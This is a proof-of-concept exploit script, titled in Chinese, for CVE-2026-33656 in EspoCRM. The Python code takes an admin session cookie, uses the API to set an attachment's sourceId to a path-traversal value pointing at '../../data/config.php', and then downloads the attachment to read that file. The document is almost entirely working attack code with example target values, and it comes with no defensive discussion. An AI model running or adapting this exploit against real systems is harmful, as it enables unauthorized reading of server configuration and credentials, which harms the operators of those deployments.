CVE-2026-33656 EspoCRM 任意文件读写漏洞

# Proof of Concept for CVE-2026-33656 # This script demonstrates the concept of exploiting the sourceId manipulation. # Requires Admin privileges. import requests def exploit(target_url, admin_session_id, attachment_id, malicious_path): """ Exploit the sourceId vulnerability to write/read arbitrary files. """ headers = { "Cookie": f"ESPOM_SID={admin_session_id}", "Content-Type": "application/json" } # Step 1: Update the attachment's sourceId using Formula Script or API # The goal is to set sourceId to something like '../../../data/config.php' payload = { "sourceId": malicious_path } update_url = f"{target_url}/api/v1/Attachment/{attachment_id}" response = requests.patch(update_url, json=payload, headers=headers) if response.status_code == 200: print(f"[+] Successfully updated sourceId for attachment {attachment_id}") print(f"[+] Attempting to access file at: {malicious_path}") # Step 2: Trigger file read operation (e.g., downloading the attachment) download_url = f"{target_url}/api/v1/Attachment/{attachment_id}/download" file_response = requests.get(download_url, headers=headers) if file_response.status_code == 200: print("[+] File content retrieved:") print(file_response.text) else: print("[-] Failed to retrieve file.") else: print("[-] Failed to update attachment.") if __name__ == "__main__": # Example usage TARGET = "http://localhost/espocrm" SESSION = "admin_session_cookie_here" ATTACHMENT_ID = "target_attachment_id" # Path traversal payload to read config file PAYLOAD_PATH = "../../data/config.php" exploit(TARGET, SESSION, ATTACHMENT_ID, PAYLOAD_PATH)